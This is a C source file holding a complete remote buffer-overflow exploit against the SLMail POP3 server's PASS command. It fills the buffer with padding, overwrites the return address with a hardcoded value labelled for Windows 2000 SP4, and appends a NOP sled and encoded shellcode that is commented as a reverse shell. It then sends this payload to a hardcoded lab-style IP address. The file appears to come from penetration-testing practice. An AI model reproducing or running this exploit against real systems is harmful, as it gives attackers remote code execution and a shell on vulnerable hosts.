#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
//added
#include <unistd.h>
#include <arpa/inet.h>

#define retadd "\x8f\x35\x4a\x5f" /*win2k server sp4 0x773a459f*/
#define port 110

/* revshell العراق القراصنة المجموعة*/
unsigned char shellcode[] =
"\xba\xd1\xe5\x16\xd6\xda\xde\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x52\x83\xeb\xfc\x31\x53\x0e\x03\x82\xeb\xf4\x23\xd8\x1c\x7a"
"\xcb\x20\xdd\x1b\x45\xc5\xec\x1b\x31\x8e\x5f\xac\x31\xc2\x53"
"\x47\x17\xf6\xe0\x25\xb0\xf9\x41\x83\xe6\x34\x51\xb8\xdb\x57"
"\xd1\xc3\x0f\xb7\xe8\x0b\x42\xb6\x2d\x71\xaf\xea\xe6\xfd\x02"
"\x1a\x82\x48\x9f\x91\xd8\x5d\xa7\x46\xa8\x5c\x86\xd9\xa2\x06"
"\x08\xd8\x67\x33\x01\xc2\x64\x7e\xdb\x79\x5e\xf4\xda\xab\xae"
"\xf5\x71\x92\x1e\x04\x8b\xd3\x99\xf7\xfe\x2d\xda\x8a\xf8\xea"
"\xa0\x50\x8c\xe8\x03\x12\x36\xd4\xb2\xf7\xa1\x9f\xb9\xbc\xa6"
"\xc7\xdd\x43\x6a\x7c\xd9\xc8\x8d\x52\x6b\x8a\xa9\x76\x37\x48"
"\xd3\x2f\x9d\x3f\xec\x2f\x7e\x9f\x48\x24\x93\xf4\xe0\x67\xfc"
"\x39\xc9\x97\xfc\x55\x5a\xe4\xce\xfa\xf0\x62\x63\x72\xdf\x75"
"\x84\xa9\xa7\xe9\x7b\x52\xd8\x20\xb8\x06\x88\x5a\x69\x27\x43"
"\x9a\x96\xf2\xc4\xca\x38\xad\xa4\xba\xf8\x1d\x4d\xd0\xf6\x42"
"\x6d\xdb\xdc\xea\x04\x26\xb7\x1e\xd2\x28\x3e\x77\xe6\x28\xc1"
"\x3c\x6f\xce\xab\x52\x26\x59\x44\xca\x63\x11\xf5\x13\xbe\x5c"
"\x35\x9f\x4d\xa1\xf8\x68\x3b\xb1\x6d\x99\x76\xeb\x38\xa6\xac"
"\x83\xa7\x35\x2b\x53\xa1\x25\xe4\x04\xe6\x98\xfd\xc0\x1a\x82"
"\x57\xf6\xe6\x52\x9f\xb2\x3c\xa7\x1e\x3b\xb0\x93\x04\x2b\x0c"
"\x1b\x01\x1f\xc0\x4a\xdf\xc9\xa6\x24\x91\xa3\x70\x9a\x7b\x23"
"\x04\xd0\xbb\x35\x09\x3d\x4a\xd9\xb8\xe8\x0b\xe6\x75\x7d\x9c"
"\x9f\x6b\x1d\x63\x4a\x28\x2d\x2e\xd6\x19\xa6\xf7\x83\x1b\xab"
"\x07\x7e\x5f\xd2\x8b\x8a\x20\x21\x93\xff\x25\x6d\x13\xec\x57"
"\xfe\xf6\x12\xcb\xff\xd2";

struct sockaddr_in plm,lar,target;
 
int conn(char *ip)
{
 int sockfd;
 plm.sin_family = AF_INET;
 plm.sin_port = htons(port);
 plm.sin_addr.s_addr = inet_addr(ip);
 bzero(&(plm.sin_zero),8);
 sockfd = socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr *)&plm,sizeof(struct sockaddr))) < 0)
{
 perror("[-] connect error!");
 exit(0);
}
 printf("[*] Connected to: %s.\n",ip);
 return sockfd;
}
 
int main(int argc, char *argv[])
{
    int xs;
    char out[1024];
    char *buffer = malloc(2960);
    memset(buffer, 0x00, 2960);
    char *off = malloc(2606);
    memset(off, 0x00, 2606);
    memset(off, 0x41, 2606);
    char *nop = malloc(8);
    memset(nop, 0x00, 8);
    memset(nop, 0x90, 8);
    strcat(buffer, off);
    strcat(buffer, retadd);
    strcat(buffer, nop);
    strcat(buffer, shellcode);

    printf("[+] SLMAIL Remote buffer overflow exploit in POP3 PASS by Haroon Rashid Astwat.\n");
    xs = conn("10.11.23.157");
    read(xs, out, 1024);
    printf("[*] %s", out);
    write(xs,"USER username\r\n", 15);
    read(xs, out, 1024);
    printf("[*] %s", out);
    write(xs,"PASS ",5);
    write(xs,buffer,strlen(buffer));
    printf("Shellcode len: %d bytes\n",strlen(shellcode));
    printf("Buffer len: %d bytes\n",strlen(buffer));
    write(xs,"\r\n",4);
    close(xs);  
}
